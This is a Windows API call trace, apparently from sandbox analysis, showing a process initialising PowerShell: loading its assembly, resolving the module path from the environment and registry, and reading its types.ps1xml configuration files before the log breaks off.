	[0429.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.759] CoTaskMemAlloc (cb=0x104) returned 0x1b82df50
	[0429.759] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1b82df50, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0429.759] CoTaskMemFree (pv=0x1b82df50) 
	[0429.761] CoTaskMemAlloc (cb=0xcc) returned 0x49ae70
	[0429.761] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x49ae70, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0429.761] CoTaskMemFree (pv=0x49ae70) 
	[0429.761] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d628 | out: phkResult=0x24d628*=0x314) returned 0x0
	[0429.761] RegQueryValueExW (in: hKey=0x314, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x24d5ac, lpData=0x0, lpcbData=0x24d5a8*=0x0 | out: lpType=0x24d5ac*=0x2, lpData=0x0, lpcbData=0x24d5a8*=0x6c) returned 0x0
	[0429.761] CoTaskMemAlloc (cb=0x70) returned 0x421f00
	[0429.761] RegQueryValueExW (in: hKey=0x314, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x24d57c, lpData=0x421f00, lpcbData=0x24d578*=0x6c | out: lpType=0x24d57c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x24d578*=0x6c) returned 0x0
	[0429.762] CoTaskMemFree (pv=0x421f00) 
	[0429.762] CoTaskMemAlloc (cb=0xcc) returned 0x49ae70
	[0429.762] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x49ae70, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0429.762] CoTaskMemFree (pv=0x49ae70) 
	[0429.762] CoTaskMemAlloc (cb=0xcc) returned 0x49ae70
	[0429.762] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x49ae70, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0429.762] CoTaskMemFree (pv=0x49ae70) 
	[0429.765] RegCloseKey (hKey=0x314) returned 0x0
	[0429.766] CoTaskMemAlloc (cb=0xcc) returned 0x49ae70
	[0429.766] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x49ae70, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0429.766] CoTaskMemFree (pv=0x49ae70) 
	[0429.766] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d628 | out: phkResult=0x24d628*=0x314) returned 0x0
	[0429.766] RegQueryValueExW (in: hKey=0x314, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x24d5ac, lpData=0x0, lpcbData=0x24d5a8*=0x0 | out: lpType=0x24d5ac*=0x0, lpData=0x0, lpcbData=0x24d5a8*=0x0) returned 0x2
	[0429.766] RegCloseKey (hKey=0x314) returned 0x0
	[0429.771] CoTaskMemAlloc (cb=0x20c) returned 0x4165e0
	[0429.772] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x4165e0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0429.773] CoTaskMemFree (pv=0x4165e0) 
	[0429.773] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x24d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0429.774] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0429.785] CoTaskMemAlloc (cb=0x104) returned 0x1b82df50
	[0429.785] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b82df50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.785] CoTaskMemFree (pv=0x1b82df50) 
	[0429.785] CoTaskMemAlloc (cb=0x104) returned 0x1b82df50
	[0429.786] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b82df50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.786] CoTaskMemFree (pv=0x1b82df50) 
	[0429.787] CoTaskMemAlloc (cb=0x104) returned 0x1b82df50
	[0429.787] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b82df50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.788] CoTaskMemFree (pv=0x1b82df50) 
	[0429.788] CoTaskMemAlloc (cb=0x104) returned 0x1b82df50
	[0429.788] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b82df50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.788] CoTaskMemFree (pv=0x1b82df50) 
	[0429.789] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d418 | out: phkResult=0x24d418*=0x31c) returned 0x0
	[0429.790] RegQueryValueExW (in: hKey=0x31c, lpValueName="path", lpReserved=0x0, lpType=0x24d42c, lpData=0x0, lpcbData=0x24d428*=0x0 | out: lpType=0x24d42c*=0x1, lpData=0x0, lpcbData=0x24d428*=0x74) returned 0x0
	[0429.791] RegQueryValueExW (in: hKey=0x31c, lpValueName="path", lpReserved=0x0, lpType=0x24d39c, lpData=0x0, lpcbData=0x24d398*=0x0 | out: lpType=0x24d39c*=0x1, lpData=0x0, lpcbData=0x24d398*=0x74) returned 0x0
	[0429.791] CoTaskMemAlloc (cb=0x78) returned 0x421f00
	[0429.791] RegQueryValueExW (in: hKey=0x31c, lpValueName="path", lpReserved=0x0, lpType=0x24d36c, lpData=0x421f00, lpcbData=0x24d368*=0x74 | out: lpType=0x24d36c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x24d368*=0x74) returned 0x0
	[0429.791] CoTaskMemFree (pv=0x421f00) 
	[0429.791] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x24d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0429.791] SetErrorMode (uMode=0x1) returned 0x1
	[0429.791] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x24d2f0 | out: lpFileInformation=0x24d2f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0429.791] SetErrorMode (uMode=0x1) returned 0x1
	[0429.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0429.792] SetErrorMode (uMode=0x1) returned 0x1
	[0429.792] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d2f0 | out: lpFileInformation=0x24d2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0429.792] SetErrorMode (uMode=0x1) returned 0x1
	[0429.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0429.794] SetErrorMode (uMode=0x1) returned 0x1
	[0429.794] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d2f0 | out: lpFileInformation=0x24d2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0429.794] SetErrorMode (uMode=0x1) returned 0x1
	[0429.794] CoTaskMemAlloc (cb=0x104) returned 0x1b82df50
	[0429.794] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b82df50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.794] CoTaskMemFree (pv=0x1b82df50) 
	[0429.795] CoTaskMemAlloc (cb=0x104) returned 0x1b82df50
	[0429.795] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b82df50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.795] CoTaskMemFree (pv=0x1b82df50) 
	[0429.796] GetACP () returned 0x4e4
	[0429.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0429.945] SetErrorMode (uMode=0x1) returned 0x1
	[0429.946] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0429.946] SetErrorMode (uMode=0x1) returned 0x1
	[0429.946] GetFileType (hFile=0x320) returned 0x1
	[0429.948] ReadFile (in: hFile=0x320, lpBuffer=0x2e57038, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2e57038*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0429.949] ReadFile (in: hFile=0x320, lpBuffer=0x2e57038, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2e57038*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0429.949] ReadFile (in: hFile=0x320, lpBuffer=0x2e57038, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2e57038*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0429.949] ReadFile (in: hFile=0x320, lpBuffer=0x2e57038, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2e57038*, lpNumberOfBytesRead=0x24d228*=0xcf3, lpOverlapped=0x0) returned 1
	[0429.949] ReadFile (in: hFile=0x320, lpBuffer=0x2e56493, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2e56493*, lpNumberOfBytesRead=0x24d228*=0x0, lpOverlapped=0x0) returned 1
	[0429.950] ReadFile (in: hFile=0x320, lpBuffer=0x2e57038, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2e57038*, lpNumberOfBytesRead=0x24d228*=0x0, lpOverlapped=0x0) returned 1
	[0429.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0429.952] SetErrorMode (uMode=0x1) returned 0x1
	[0429.952] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d1a0 | out: lpFileInformation=0x24d1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0429.952] SetErrorMode (uMode=0x1) returned 0x1
	[0429.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0429.953] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d288 | out: phkResult=0x24d288*=0x320) returned 0x0
	[0429.953] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d20c, lpData=0x0, lpcbData=0x24d208*=0x0 | out: lpType=0x24d20c*=0x1, lpData=0x0, lpcbData=0x24d208*=0x56) returned 0x0
	[0429.953] CoTaskMemAlloc (cb=0x5a) returned 0x48e2f0
	[0429.953] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d1dc, lpData=0x48e2f0, lpcbData=0x24d1d8*=0x56 | out: lpType=0x24d1dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d1d8*=0x56) returned 0x0
	[0429.953] CoTaskMemFree (pv=0x48e2f0) 
	[0429.953] RegCloseKey (hKey=0x320) returned 0x0
	[0429.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0429.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0429.977] GetSystemInfo (in: lpSystemInfo=0x24bec0 | out: lpSystemInfo=0x24bec0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0429.978] VirtualQuery (in: lpAddress=0x24bf70, lpBuffer=0x24ce30, dwLength=0x30 | out: lpBuffer=0x24ce30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24cca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0430.098] SetErrorMode (uMode=0x1) returned 0x1
	[0430.098] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c
	[0430.099] GetFileType (hFile=0x30c) returned 0x1
	[0430.099] SetErrorMode (uMode=0x1) returned 0x1
	[0430.099] GetFileType (hFile=0x30c) returned 0x1
	[0430.099] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.100] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.100] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.100] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.100] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.100] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.101] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.101] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.101] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.102] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.102] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.102] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.102] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.103] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.103] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.103] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.103] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.105] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.105] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.105] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.105] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
	[0430.106] ReadFile (in: hFile=0x30c, lpBuffer=0x2d4b4d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d228, lpOverlapped=0x0 | out: lpBuffer=0x2d4b4d8*, lpNumberOfBytesRead=0x24d228*=0x1000, lpOverlapped=0x0) returned 1
